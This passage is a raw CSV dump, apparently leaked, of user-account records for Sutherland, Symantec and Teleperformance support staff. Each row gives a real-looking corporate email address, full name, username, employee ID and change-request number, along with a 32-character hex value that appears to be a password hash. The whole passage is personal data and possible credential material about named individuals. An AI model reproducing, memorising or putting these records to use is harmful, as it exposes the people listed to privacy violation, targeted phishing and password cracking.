da575fc5621ded476d5c9bc896d27e0,Parag,<blank>,Erezath_Parag_Subhagan,Erezath,NUL
L,NULL,NULL
b1-41b1-b1fc-9a62eb8eb511,<blank>,<blank>,Fahim_Shaikh@SUTH.COM,Sutherland,b42af
414592a1d439667f3041bae789d,Nazim,<blank>,Fahim_Nazim_Shaikh,Fahim,NULL,NULL,NUL
L
da7d-473b-8c8c-2a45df10c949,"CRQ000000677567 CLNP May 30,2012",000-000-0000,tool
s_id@symantec.suth.com,Sutherland,0bc9fb061dcbc6fc7ccaf2ff08036b5b,Kumar,<blank>
,225978,Sandeep,NULL,NULL,NULL
37-43d3-9d76-50dd4b47e113,<blank>,<blank>,Faizal_Nizamudeen@SUTH.COM,Sutherland,
b52543853caf1078fda317daecd35ceb,Nizamudeen,<blank>,Faizal_Nizamudeen,Faizal,NUL
L,NULL,NULL
79-4fd8-a47c-a3d81f657a19,<blank>,<blank>,FardulIskAlam_A@SUTH.COM,Sutherland,bf
91bbb70151c171dab6cf2a8363d83c,Isk,<blank>,Fardul_Isk_Alam_A,Fardul,NULL,NULL,NU
LL
a6-41d4-92da-82c386fa8ce0,<blank>,<blank>,Farhan_Shaikh@SUTH.COM,Sutherland,a3d5
6e490be2b02aa5cd92a93eee0494,Siraj,<blank>,Farhan_Siraj_Shaikh,Farhan,NULL,NULL,
NULL
88-440c-be6c-c801f8167e74,<blank>,<blank>,Ganta_Srinivas@SUTH.COM,Sutherland,a20
64a0ed803a22202f5c94953940f5d,Srinivas,<blank>,Ganta_Srinivas,Ganta,NULL,NULL,NU
LL
0d8c-417c-9da8-5e3d11c89463,"CRQ000000681089 CLNP Jun 01,2012",999-999-9999,tool
s_id@symantec.suth.com,Sutherland,b1b9b86bd350d705122b50e75f8747b0,B,<blank>,226
176,Rajesh,NULL,NULL,NULL
cb-488d-ac0b-4b174dd0f722,<blank>,<blank>,Gururakesh_DR@SUTH.COM,Sutherland,9644
5a88cf309c3fc66052fc8e86fe63,D,<blank>,Gururakesh_D_R,Gururakesh,NULL,NULL,NULL
69-4ed2-8b71-2a629898e139,<blank>,<blank>,HabeebRahman_TA@SUTH.COM,Sutherland,5b
484efe7a0f7812eb0fe94a079595f3,Rahman,<blank>,Habeeb_Rahman_T_A,Habeeb,NULL,NULL
,NULL
b8-43d0-96e5-d0c67beeef81,<blank>,<blank>,Hafsal_H@SUTH.COM,Sutherland,5fb40b17d
7e3cf7a3a95f863852f39c2,C,<blank>,Hafsal_C_H,Hafsal,NULL,NULL,NULL
b5-43ce-afca-75e775dc766d,<blank>,<blank>,HajiMohaqmed_A@SUTH.COM,Sutherland,25a
eaf8bbdfa29f872b1f04996c7001b,Mohaqmed,<blank>,Haji_Mohaqmed_A,Haji,NULL,NULL,NU
LL
06-4e9e-aa40-ef548f4eb48e,<blank>,<blank>,Handrick_Fernandes@SUTH.COM,Sutherland
,d4c9efe0cecdece73aeecab934ddb0e3,Wilson,<blank>,Handrick_Wilson_Fernandes,Handr
ick,NULL,NULL,NULL
436b-46ac-9d97-05c80509c7fe,CRQ000000272484--vmd-07/06/2011,000-000,tools_id@sym
antec.suth.com,Sutherland,32736ee8a2e01ca9c4a7c700e1072d3b,Cabatbat,<blank>,1168
96,DeanAlbert Padayao,NULL,NULL,NULL
cd-4768-988c-2c01a49825ab,<blank>,<blank>,HannifMohamed_H@SUTH.COM,Sutherland,45
50b2ba5c1bcc8b5147ae9a0cf406ec,Mohamed,<blank>,Hannif_Mohamed_H,Hannif,NULL,NULL
,NULL
37-44e4-8a3c-2ceca1b0bbc6,<blank>,<blank>,InfantPatrickSharon_B@SUTH.COM,Sutherl
and,5c7ced6e159b97bc2d292330c53b03bf,Patrick,<blank>,Infant_Patrick_Sharon_B,Inf
ant,NULL,NULL,NULL
61-4432-a1c6-36aee90fca7d,<blank>,<blank>,Intaquab_Patel@SUTH.COM,Sutherland,8f8
22ed49d6307774c15a1d2b26be2e8,Bilkish,<blank>,Intaquab_Bilkish_Patel,Intaquab,NU
LL,NULL,NULL
d4-4959-b85a-723ef1e69d2d,<blank>,<blank>,Iqbal_Yaqub@suth.com,Sutherland,365c5c
9dd6b66dc506e5aff812986511,Yaqub,<blank>,Iqbal_Yaqub,Iqbal,NULL,NULL,NULL
6c-4da9-85db-9c4a5521fe3a,<blank>,<blank>,SNIrfan@suth.com,Sutherland,82ffff23d5
676296a10c30ad25a19273,Nizam,<blank>,Irfan_Nizam_Shaikh,Irfan,NULL,NULL,NULL
5f-4c8b-b776-de6149f92a26,<blank>,<blank>,Jacob_Joseph@SUTH.COM,Sutherland,a7e6c
2e63bff0b76249678e034634048,Joseph,<blank>,Jacob_Joseph,Jacob,NULL,NULL,NULL
6b-4794-a6c3-0208b64e6b89,<blank>,<blank>,Jaffar_Jamal@SUTH.COM,Sutherland,dfaf0
0e98086f642c9488004ae78a2d9,Jamal,<blank>,Jaffar_Jamal,Jaffar,NULL,NULL,NULL
1e-43dd-9401-aefb1388eb1b,<blank>,<blank>,jagan_gurunathan@suth.com,Sutherland,b
9a3ed4013f67b18aefa87648875c549,Gurunathan,<blank>,Jagan_Gurunathan,Jagan,NULL,N
ULL,NULL
25-4a85-a742-2d3f7ddd2767,<blank>,<blank>,ranjagan@suth.com,Sutherland,b19f603d5
ad5ebe60707619770438583,Ranganathan,<blank>,Jagannathan_Ranganathan,Jagannathan,
NULL,NULL,NULL
22-4f44-9091-cadbcd4476bf,<blank>,<blank>,Jaimon_T@SUTH.COM,Sutherland,441310225
c0804ad27651ecf188a88a5,T,<blank>,Jaimon_T,Jaimon,NULL,NULL,NULL
83-457e-a1e0-f55af61a9dc8,<blank>,<blank>,JansiRani_V@SUTH.COM,Sutherland,24154e
fb99e87ae882ee5b71c9fb2538,Rani,<blank>,Jansi_Rani_V,Jansi,NULL,NULL,NULL
d8-4ab9-8481-b891841bcda8,<blank>,<blank>,JasmineMary_ST@SUTH.COM,Sutherland,245
6b0a24a70a9a3986abc49ecde3337,Mary,<blank>,Jasmine_Mary_S_T,Jasmine,NULL,NULL,NU
LL
d6-4190-a856-482242a54c3b,<blank>,<blank>,Gurdipsingh_Gujral@SUTH.COM,Sutherland
,0cb46445b8adaba6b4b6efe616b0c0f5,Gujral,<blank>,Gurdipsingh_Gujral,Gurdipsingh,
NULL,NULL,NULL
e5-4e29-a2a1-812bcc4312a4,<blank>,<blank>,Harikumar_R@SUTH.COM,Sutherland,7f6430
805e1381d778e2555394c10063,R,<blank>,Harikumar_R,Harikumar,NULL,NULL,NULL
6d76-4527-b81c-86b432242efb,CRQ000000709695--vmd--26/06/2012,<blank>,alda_cochic
o@suth.com,sutherland,5f37bb233ae6929e02dcf7ea4e15c756,Cochico,<blank>,226435,Al
da,NULL,NULL,NULL
d0-4bb6-abfa-6f86abde8b77,<blank>,<blank>,MHariram@suth.com,Sutherland,94b12c3e8
52856ea13098092b2d93859,Mukundan,<blank>,Hariram_Mukundan,Hariram,NULL,NULL,NULL
bcfe-4806-ace3-df7b81404e8c,"CRQ000000682547 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,b3b7edd1dbc551a853b02006726b2f60,Mane,<blank>
,226231,Prathamesh,NULL,NULL,NULL
63fb-461a-af8e-a754e3c985e7,<blank>,<blank>,abasso@symantec.teleperformance.gr,C
T - 12/09/2012 - CRQ000000800624,7d8ffcfd9ebf91c216f7cba7101ff787,Basso,<blank>,
229975,Aureliano,NULL,NULL,NULL
6e-4cbb-bd72-f705befaa51c,<blank>,<blank>,harish_k@suth.com,Sutherland,69ce21022
f3375223a4913ebe86c8312,Sharma,<blank>,Harish_Sharma_Kailash,Harish,NULL,NULL,NU
LL
5e-4a49-b92f-dad8ab4b27ad,<blank>,<blank>,Harnish_Darji@SUTH.COM,Sutherland,7bfd
c05a43c4d42b798589b283569e4a,Vinod,<blank>,Harnish_Vinod_Darji,Harnish,NULL,NULL
,NULL
2bff-4c5d-a471-b30efd3f3713,<blank>,<blank>,tools_id@symantec.suth.com,11th Jan
2012 - PR - CRQ000000496537,c234c23794a4c5b564e069df741779e5,Abellar,<blank>,123
858,Nice,NULL,NULL,NULL
c16b-4763-bcb6-c099c418a4b3,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,325e22cbb602170f753d1e7750934d72,Yousuf,<blank>,ibrahim_yousuf_cc,Ibrahim
,NULL,NULL,NULL
17c5-4ae3-adde-8beff615c006,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,f2c954f6a69ebd4f26d0c76a56e5eb3a,Santhosh,<blank>,kavitha_santhosh_cc,Kav
itha ,NULL,NULL,NULL
75-489e-a080-bb0604ab911f,<blank>,<blank>,Hasib_Khan@SUTH.COM,Sutherland,66dea18
b47887bbe42b3b574901c8bdd,Ayub,<blank>,Hasib_Ayub_Khan,Hasib,NULL,NULL,NULL
41-45b1-936e-05ae52628e5b,<blank>,<blank>,Heena_Agrawal@SUTH.COM,Sutherland,5809
5e6a563a4c20bc012ad6b98dea2e,Rajendra,<blank>,Heena_Rajendra_Agrawal,Heena,NULL,
NULL,NULL
90-4000-a50a-93cf5e2f1343,<blank>,<blank>,Helena_Vijayakumar@suth.com,Sutherland
,87b02f57822922b51ac5c31ddebd25f2,Vijayakumar,<blank>,Helena_Vijayakumar,Helena,
NULL,NULL,NULL
09-4072-895a-241a878c9a5b,<blank>,<blank>,Hema_Venkatesan@SUTH.COM,Sutherland,b5
89bee740086e44d7cb280322c862cd,Venkatesan,<blank>,Hema_Venkatesan,Hema,NULL,NULL
,NULL
7c-40af-999c-48c7690e2e97,<blank>,<blank>,Hemang_Vaghela@SUTH.COM,Sutherland,c17
931f5bc5fd0dc89d50f4dd5c2935b,Pratap,<blank>,Hemang_Pratap_Vaghela,Hemang,NULL,N
ULL,NULL
1c-4637-b98c-c107f62b260b,<blank>,<blank>,Hemant_Dhall@SUTH.COM,Sutherland,9f252
833c38df49251f862c9168c135f,H,<blank>,Hemant_H_Dhall,Hemant,NULL,NULL,NULL
de-4f54-b57d-ae51caadaf75,<blank>,<blank>,Hemant_Patil@SUTH.COM,Sutherland,8572c
5690a1a7388c6f652566fccbe45,Naresh,<blank>,Hemant_Naresh_Patil,Hemant,NULL,NULL,
NULL
86-4bca-a6ea-b256a86716cb,<blank>,<blank>,InamHussain_MD@SUTH.COM,Sutherland,ee6
020296cf4cf6d11691fa314c13120,Hussain,<blank>,Inam_Hussain_MD,Inam,NULL,NULL,NUL
L
1c-4d13-b6bb-f73aa4253528,<blank>,<blank>,JaySuresh_Manjrekar@SUTH.COM,Sutherlan
d,05b8706688ef8d50e55d759eb7485a71,Suresh,<blank>,Jay_Suresh_Manjrekar,Jay,NULL,
NULL,NULL
3f-44e6-9ff2-ab7657e6c2d8,<blank>,<blank>,Jaya_Thadani@suth.com,Sutherland,70f5e
b6c056fc890df74efc0161bfb98,Jagdish,<blank>,Jaya_Jagdish_Thadani,Jaya,NULL,NULL,
NULL
8f-45ac-b119-4ca30d47a414,<blank>,<blank>,JayaPratha_VP@SUTH.COM,Sutherland,e668
cd7b13a81259040313c5a74597dc,Pratha,<blank>,Jaya_Pratha_V_P,Jaya,NULL,NULL,NULL
7919-45d6-8b42-333d19d123f2,<blank>,<blank>,tools_id@symantec.suth.com,11th Jan
2012 - PR - CRQ000000496540,ab494a464a43219f98409879616fadb6,Masucol,<blank>,123
859,PeterJohn,NULL,NULL,NULL
4508-46d7-9b48-2c011ad17025,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,251b596f1be53ce57a94aa93749b9269,M,<blank>,shalini_m_cc,Shalini ,NULL,NUL
L,NULL
f95e-49b9-a5c8-b5db95be9b5e,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,fa14cd3ddbf14887d583187a770ec197,Ponnusamy,<blank>,089506,SenthilKumar,NULL,NUL
L,NULL
2b-45c5-9891-131b2454f282,<blank>,2633288,tools_id@symantec.suth.com,Sutherland,
48d3fee2e6e4d23cec3e473eef3e9b6a,Francis,<blank>,Jeffrey_Francis_Pereira,Jeffrey
,NULL,NULL,NULL
ec-4add-9343-6cb577948395,<blank>,<blank>,Jerrin_James@SUTH.COM,Sutherland,7e4b2
aa9087df3789a8606bcd99117f9,James,<blank>,Jerrin_James,Jerrin,NULL,NULL,NULL
56-4552-aaff-f91641d0f4e3,<blank>,<blank>,Hardick_Bhatt@SUTH.COM,Sutherland,ec7e
603f9066971c06a18a25e9546c70,Bhatt,<blank>,Hardick_Bhatt,Hardick,NULL,NULL,NULL
85-4f42-978b-21ab4b9e5247,<blank>,<blank>,KAIlyas@suth.com,Sutherland,5a60f2a8c1
9ce13fae63bc64a623e627,Aziz,<blank>,Ilyas_Aziz_Khan,Ilyas,NULL,NULL,NULL
17-4feb-93ef-77cc82194413,<blank>,<blank>,ImranAltafHusenKhan_A@SUTH.COM,Sutherl
and,c316db3d58f8d75a47d65ccf6cd6c70a,Altaf,<blank>,Imran_Altaf_Husen_Khan,Imran,
NULL,NULL,NULL
19-4617-8731-82a5de2d79ba,<blank>,<blank>,JestinNirmalraj_F@SUTH.COM,Sutherland,
82f2a0928be5b49dc2d8def5d917aa1a,Nirmal,<blank>,Jestin_Nirmal_raj_F,Jestin,NULL,
NULL,NULL
12-43eb-8462-e3c6b7db9415,<blank>,<blank>,Jeswin_Jose@SUTH.COM,Sutherland,5a09ea
2d9fdff4775c956518d7d1ce16,Jose,<blank>,Jeswin_Jose,Jeswin,NULL,NULL,NULL
18-4c68-9210-110afbf71579,<blank>,<blank>,JibinK_K@SUTH.COM,Sutherland,104556df5
f836193e8fb37e724cd39d7,Kuttappan,<blank>,Jibin_Kuttappan,Jibin,NULL,NULL,NULL
c0-476d-a265-c351ae96e4c2,<blank>,<blank>,jumpa_namgyal@SUTH.COM,Sutherland,8752
86ec69b54920c40fc730790cc102,Namgyal,<blank>,Jimpa_Namgyal,Jimpa,NULL,NULL,NULL
c067-4258-8ca4-bb7da7387eb1,"CRQ000000724012 CLNP July 09,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,72b64ebca3fd9ebcfa1c1b2311c9cb34,Podishetty,<
blank>,227153,Nishitha,NULL,NULL,NULL
80-460e-9acf-b0c8bec5dea5,WS 19-07-2010,INC213497,Joe_John@SUTH.COM,Sutherland,4
12a861eaaf596b2887d06e7fa584310,Freesar,<blank>,Joe_Freesar_John,Joe,NULL,NULL,N
ULL
9b-4870-8a4a-6cabb6a8ab59,<blank>,<blank>,Joel_Kiny@SUTH.COM,Sutherland,c9d742f1
b49ad4a94db3907daebf3050,Francis,<blank>,Joel_Francis_Kiny,Joel,NULL,NULL,NULL
95-4556-91fa-461f89f2430c,<blank>,<blank>,John_Alexander@suth.com,Sutherland,ecc
dd9a92d8ac3dee560e8d1e037713e,Alexander,<blank>,John_Alexander_T_Samuel,John,NUL
L,NULL,NULL
14-49eb-926a-e0d61c6e8644,<blank>,<blank>,John_P1@SUTH.COM,Sutherland,81cd829cdc
6b5503184967e3e33924e7,Antony,<blank>,John_Antony_P,John,NULL,NULL,NULL
00-4888-83a0-cd7dd7bcb695,<blank>,2633284,tools_id@symantec.suth.com,Sutherland,
ef3125c8213a9beed3bd9a4e1de5155e,Rozario,<blank>,John_Rozario_Soares,John,NULL,N
ULL,NULL
81-44f8-b900-1c6160b2d964,<blank>,<blank>,Johnshi@suth.com,Sutherland,00f8bfb3e2
a38c45790ad2c2d60ef790,Rani,<blank>,Johnshi_Rani_Ganesan,Johnshi,NULL,NULL,NULL
bd-4ff5-87fd-2e2c35cb0a6a,<blank>,<blank>,Johnson_Richard@suth.com,Sutherland,ed
b95708620ebd7ade9834a5aa44fa64,Anburaj,<blank>,Johnson_Anburaj_Richard,Johnson,N
ULL,NULL,NULL
b9-48ea-aac1-c3ff803ffc25,<blank>,<blank>,Jose_P@SUTH.COM,Sutherland,04270475a4b
20d2390d7ae4a317cd70c,Lafentine,<blank>,Jose_Lafentine_P,Jose,NULL,NULL,NULL
9f-427c-85be-ef8e517c44bd,<blank>,<blank>,Jose_Raphael@SUTH.COM,Sutherland,558cb
564d9e3f3c6ecefa9dfbc006db7,V,<blank>,Jose_V_Raphael,Jose,NULL,NULL,NULL
7a-431d-bf98-11123f793e53,<blank>,<blank>,christy_jacob@suth.com,Sutherland,d55c
ed25611a4034bc864e5c89935e4c,Christy,<blank>,Joseph_Christy_Jacob,Joseph,NULL,NU
LL,NULL
b3-4937-ab1f-5ce98cc67cd1,<blank>,<blank>,Joseph_George@SUTH.COM,Sutherland,88eb
86bc96b25bccee31704ac0591c2b,George,<blank>,Joseph_George,Joseph,NULL,NULL,NULL
b0-482f-b247-663d3997ab9c,<blank>,<blank>,JosephKamaladossGnanadurai_A@SUTH.COM,
Sutherland,1c3ffc4fdff769a08c8907733ea80c0a,Kamaladoss,<blank>,Joseph_Kamaladoss
_Gnanadurai_A,Joseph,NULL,NULL,NULL
ec-41a1-99e0-80661b2c0c44,<blank>,<blank>,JoshuaPrasad_Y@SUTH.COM,Sutherland,bc9
456275ab6be7a75129ba16604c7a7,Prasad,<blank>,Joshua_Prasad_Y,Joshua,NULL,NULL,NU
LL
07-4ff0-9c69-8eb424fd8118,<blank>,<blank>,Joyson_Keishing@SUTH.COM,Sutherland,11
0ec84ee282eb2e9575553c066d8562,Keishing,<blank>,Joyson_Keishing,Joyson,NULL,NULL
,NULL
0cd6-4f5b-90f8-5e8d2c9dee3a,CRQ000000601525--vmd--22/03/2012,000-000,nazel_aliso
n@Suth.com,Sutherland,123926f60a3e87ba244f2493247d7d32,Alison,<blank>,222594,Naz
el,NULL,NULL,NULL
1b-43d4-a0ce-82592b528c95,<blank>,<blank>,JulianSofia_A@SUTH.COM,Sutherland,d645
e8588a110f5d885e86cd0553b2b3,Sofia,<blank>,Julian_Sofia_A,Julian,NULL,NULL,NULL
db-454f-94d7-b3d1b9da4b57,<blank>,<blank>,Julie_Fernandes@suth.com,Sutherland,58
b698ec9c3c42b371b9c94da679dd23,Elly,<blank>,Julie_Elly_James_Fernandes,Julie,NUL
L,NULL,NULL
f2-4988-850a-2100299e8681,<blank>,<blank>,Julius_R@SUTH.COM,Sutherland,15d931f8e
3b17a0a588b02be88979f74,Swami,<blank>,Julius_Swami_Raj,Julius,NULL,NULL,NULL
49-43db-bb1a-0c5d745181bc,<blank>,<blank>,Kailash_Amberkar@suth.com,Sutherland,d
d3133c962509a693a9839aa2a554a7f,Suresh,<blank>,Kailash_Suresh_Amberkar,Kailash,N
ULL,NULL,NULL
dae9-46c7-8d48-5b028fbcdc19,"CRQ000000602111 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,b42cd8a550595cc4de77c1df9024d53a,Benedicto,<bla
nk>,222552,HenryBryan,NULL,NULL,NULL
88-42a4-b7fd-cbac9c3f384e,<blank>,<blank>,KandaKumar_Panaiyadian@SUTH.COM,Suther
land,466b272fbe5869b1f5110c5b1c437a91,Kumar,<blank>,Kanda_Kumar_Panaiyadian,Kand
a,NULL,NULL,NULL
ae-468a-9657-b4283b9eced1,<blank>,<blank>,Hochiminh_Jose@SUTH.COM,Sutherland,0ed
9752aaeff6af95311b0976c91ab07,Jose,<blank>,Hochiminh_Jose,Hochiminh,NULL,NULL,NU
LL
0b53-476e-a2bd-337a297653c4,CRQ000000353692 SP OCT 10 2011,000-0000,Siby_John@sy
mantec.com,Sutherland,a98ad95bfff2e24779b1b6033f34b56c,John,<blank>,109123,Siby,
NULL,NULL,NULL
2a-4b23-b3b0-6ab48f7e2dc4,<blank>,<blank>,HuidromSamson_Meitei@SUTH.COM,Sutherla
nd,51910475beb6074be0ecbdaa1d9366e2,Samson,<blank>,Huidrom_Samson_Meitei,Huidrom
,NULL,NULL,NULL
1b-476b-bf41-097327954d4f,<blank>,<blank>,Hussain_Ali@SUTH.COM,Sutherland,224414
6432aff64e8eeed7d8a1927b64,Mohammed,<blank>,Hussain_Mohammed_Ali,Hussain,NULL,NU
LL,NULL
6992-481e-a275-322503f96640,CRQ000000196185-KD-11-2-2011,<blank>,Jayabalan_A@sym
antec.com,Symantec,781923432ba8736efaf5a240dd7de44d,A,<blank>,112025,Jayabalan,N
ULL,NULL,NULL
a7-4ba2-8aca-d11e01501bf2,<blank>,<blank>,Jackson_Gilbert@SUTH.COM,Sutherland,71
d9ab4b6c38631e0a8b7cc8e533327d,Gilbert,<blank>,Jackson_Gilbert,Jackson,NULL,NULL
,NULL
cd-44ac-aa28-7f40a6b9875f,<blank>,<blank>,JacksonSamuel_C@SUTH.COM,Sutherland,41
b1675cc05571f6a8b1002fea43952c,Samuel,<blank>,Jackson_Samuel_C,Jackson,NULL,NULL
,NULL
64-490a-be93-1a7935ee154a,<blank>,<blank>,JacksonSandiyan_MA@SUTH.COM,Sutherland
,a8a7d16f86c1c256ece3bc1bb10dae19,Sandiyan,<blank>,Jackson_Sandiyan_M_A,Jackson,
NULL,NULL,NULL
a5-4afb-8bcd-1c25b756561b,<blank>,<blank>,sfjacob@suth.com,Sutherland,395a00d30d
d85bca60ec4899e8d8bd7c,Fabricius,<blank>,Jacob_Fabricius_Sugumar,Jacob,NULL,NULL
,NULL
f7b1-48ad-8727-38ef2c3dea7d,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 24
2012-CRQ000000568692,2c9518700924a147c7280276181060de,Cagula Fernandez,<blank>,
125292,Michelle,NULL,NULL,NULL
06-4408-bd28-76368c93e6da,<blank>,<blank>,JamesC_Mathew@SUTH.COM,Sutherland,939d
2f5cbd30b6def3b4137e223bb0f2,C,<blank>,James_C_Mathew,James,NULL,NULL,NULL
94-408d-a970-cea134d54879,<blank>,<blank>,Janani_N@SUTH.COM,Sutherland,56dd0d69b
0c91ae9c9622f8764a38f77,N,<blank>,Janani_N,Janani,NULL,NULL,NULL
af3f-4e34-a65f-4e20653d8664,<blank>,<blank>,stanley_lawrans@symantec.com,CRQ0000
00692528 - PR - 12th June 2012,babeb01ac7167529a0f59ba7f86d9877,Melliza,<blank>
,226636,Cherrie Pink ,NULL,NULL,NULL
7f-4588-9db6-59d7026ea873,<blank>,<blank>,Jason_Dsilva@SUTH.COM,Sutherland,6c139
207e335bda8008e2d9144601ac7,Nevil,<blank>,Jason_Nevil_Dsilva,Jason,NULL,NULL,NUL
L
e1-4bbe-8690-5fdfa073e0be,<blank>,<blank>,Jaspal_Nagi@SUTH.COM,Sutherland,3a0877
da1783aa38e1c5237554a11819,Singh,<blank>,Jaspal_Singh_Nagi,Jaspal,NULL,NULL,NULL
3b-4ef9-9839-80df352d7425,<blank>,<blank>,JatinPravin_Solanki@SUTH.COM,Sutherlan
d,7472b303319f14b1a0aa4d24f4fc659b,Pravin,<blank>,Jatin_Pravin_Solanki,Jatin,NUL
L,NULL,NULL
4c-426a-b6ec-a1d4572399fb,<blank>,<blank>,Javed_Khan@SUTH.COM,Sutherland,85f7046
6af9981fc309f9374eec55473,Khan,<blank>,Javed_Khan,Javed,NULL,NULL,NULL
ca09-4e0e-8b9a-7207faa14cf0,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 24
2012-CRQ000000568698,4ac4f8fc5f6ff00cb6849f7e1fbb4193,Pilpil Fernandez,<blank>,
125294,Richard,NULL,NULL,NULL
0d-47f2-b97f-9f71f4c0868a,<blank>,<blank>,Jayarani_Rajarathinam@suth.com,Sutherl
and,231cbdbdc8d7da955935c842620b732d,Rajarathinam,<blank>,Jayarani_Rajarathinam,
Jayarani,NULL,NULL,NULL
5d-4647-98a9-e5e7510c4450,<blank>,<blank>,JayasreeK_Sundaram@SUTH.COM,Sutherland
,4ebf42e5f3a15491a29e12e7c672c108,K,<blank>,Jayasree_K_Sundaram,Jayasree,NULL,NU
LL,NULL
f410-426b-be90-32cfba96b1e6,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 24
2012-CRQ000000568709,a6d0e0d56465bdfd23ccfe53426ede33,Nakan Kansi,<blank>,12529
8,Suharto,NULL,NULL,NULL
5139-4c6b-871f-051f1f3ebcf0,CRQ000000603332--vmd--23/03/2012,<blank>,rodrigo_bue
ndia@Suth.com,Sutherland,f0ee0a00b117f5e454ab4e395116d4c6,Buendia,<blank>,222659
,Rodrigo,NULL,NULL,NULL
3cd7-4adb-8a7f-3a6e44336368,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
606977 - PR - 27th March 2012,523df5ec4fccf1b4314cc668d469878b,Thakare,<blank>,2
23106,Swapnil,NULL,NULL,NULL
cee8-4b7d-9ac8-dcd7c445a4e3,<blank>,<blank>,Julia_Cassidy@symantec.com,Symantec,
41987fc2cdfcccd49318b6812b3631d0,Cassidy,<blank>,043872,Julia,NULL,NULL,NULL
24-4216-9a2d-155d5b19f257,<blank>,<blank>,Justine_Paul@SUTH.COM,Sutherland,208ca
3957c7844b374de04aae286f729,Paul,<blank>,Justine_Paul,Justine,NULL,NULL,NULL
10-45e8-af99-75278d1d7143,<blank>,<blank>,Jyothish_V@SUTH.COM,Sutherland,7a8daaf
3057b7966e3185aa06bf6ac12,Joseph,<blank>,Jyothish_Joseph_V,Jyothish,NULL,NULL,NU
LL
36-47de-8b2f-dd699fa319d9,<blank>,<blank>,Kakuli_Mishra@SUTH.COM,Sutherland,05af
02ab22757633201fcba369f101d7,Mishra,<blank>,Kakuli_Mishra,Kakuli,NULL,NULL,NULL
a9-4ef2-bfb2-49fbc9720028,<blank>,<blank>,Kalaivani_J@SUTH.COM,Sutherland,38d365
5c926a18dfc997c95fa8109894,J,<blank>,Kalaivani_J,Kalaivani,NULL,NULL,NULL
32-48fc-9113-fddcc1ca9a58,<blank>,<blank>,KalyanKumar_K@SUTH.COM,Sutherland,0977
dd9dbc1964c1f4dc2d2222125bfa,Kumar,<blank>,Kalyan_Kumar_K,Kalyan,NULL,NULL,NULL
d5-4623-9a64-c67553139544,<blank>,<blank>,Jasmine_Nelson@SUTH.COM,Sutherland,0d3
ff37dec2287a27bb749e2d09a0d23,Nelson,<blank>,Jasmine_Nelson,Jasmine,NULL,NULL,NU
LL
ca-485d-a4da-cb05918f6e8f,<blank>,<blank>,Jason_Pramodhan@SUTH.COM,Sutherland,a9
3f7db32fe6a876656e1ff8d41a4b38,Harry,<blank>,Jason_Harry_Pramodhan,Jason,NULL,NU
LL,NULL
54-45b0-b84c-133b79d9a63a,<blank>,<blank>,Jayanthi_D@SUTH.COM,Sutherland,c7eb117
b954b47cee5a4c94c540974a0,D,<blank>,Jayanthi_D,Jayanthi,NULL,NULL,NULL
d36c-407a-838e-7c79fb70082a,PM - 8/8/2011,<blank>,tools_id@symantec.suth.com,<bl
ank>,a42b7220b48205394da3e82f425f5a70,Shaikh,<blank>,119302,Noamaan,NULL,NULL,NU
LL
36-41dd-9d0f-9dd35f8cf595,<blank>,<blank>,Jayaram_R@SUTH.COM,Sutherland,915c75b4
cd86eccccf7a1de18711554a,R,<blank>,Jayaram_R,Jayaram,NULL,NULL,NULL
95-4713-bb37-6c4bbc1e9166,<blank>,<blank>,jayaraman_vasu2@suth.com,Sutherland,27
bd2d708f30683ec08069a758e56879,Vasu,<blank>,Jayaraman_Vasu,Jayaraman,NULL,NULL,N
ULL
71-4647-9023-80d953eddbf2,<blank>,<blank>,Jayashankar_K@SUTH.COM,Sutherland,7b24
160fe9c9cbc44f910954c32b9efc,K,<blank>,Jayashankar_K,Jayashankar,NULL,NULL,NULL
83-4595-86e5-f6fd3cddc413,<blank>,<blank>,Jayasurya_Shaji@SUTH.COM,Sutherland,f9
1e3c9c799f901a59bbb05ba2645287,Shaji,<blank>,Jayasurya_Shaji,Jayasurya_Shaji,NUL
L,NULL,NULL
55-4f03-89ad-4732436b9b7d,<blank>,<blank>,Jayesh_Vora@SUTH.COM,Sutherland,a5f22d
f7a8c353008be849c8d90d726b,Arjun,<blank>,Jayesh_Arjun_Vora,Jayesh,NULL,NULL,NULL
81bc-4949-83f4-3babacdc837d,<blank>,<blank>,Edwin_Austria@SPI.COM,PM - 6/14/2012
- CRQ000000694432,7a416b24570b9cf75b3fec1fad5408ff,Austria,<blank>,226699,Edwin
,NULL,NULL,NULL
dc88-465d-8b0e-41530f15e267,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
716112,5693d146ea5d20c4ecbfcacc44d83f11,Dolores,<blank>,227433,Edelle Thesa ,NUL
L,NULL,NULL
2b45-4418-b7a2-e6d58bb589f4,CRQ000000622735 SP April 10 2012,999-999-9999,vaidya
nathasamy_joth@symantec.suth.com,Sutherland,a284cb451d5b2908cb8e29d4f81c1e21,Jot
hinathan,<blank>,223554,VaidyanathaSamy,NULL,NULL,NULL
9b-4e83-919c-598685dfacc2,<blank>,<blank>,Jeeva_K2@SUTH.COM,Sutherland,a13ef952a
12d5259c1894ecad0bc3cb1,K,<blank>,Jeeva_K,Jeeva,NULL,NULL,NULL
b9-487b-84d6-89e89c4fbfe0,<blank>,<blank>,Jeevan_Philip@SUTH.COM,Sutherland,c3d8
7497b89005e7dee2e8c574c62015,Aby,<blank>,Jeevan_Aby_Philip,Jeevan,NULL,NULL,NULL
b6-4684-9462-a3e6e9330f74,<blank>,<blank>,Jeevith_P@suth.com,Sutherland,8102bf0a
a395e16c3e0845b4659265bc,C,<blank>,Jeevith_C_Ponnappa,Jeevith,NULL,NULL,NULL
4448-41ad-906e-3b4648dfe768,CRQ000000624204--vmd--11/04/2012,<blank>,aholmquist@
symantec.teleperformance.gr,Teleperformance,5251c8839a546b58f3b775c563b74077,Hol
mquist,<blank>,223745,Andreas,NULL,NULL,NULL
f7-443d-a1f9-f297ee3e53ee,<blank>,<blank>,jignesh_joshi@suth.com,Sutherland,161d
bfea27844e2f00a12f484a0728c7,Jaidev,<blank>,Jignesh_Jaidev_Joshi,Jignesh,NULL,NU
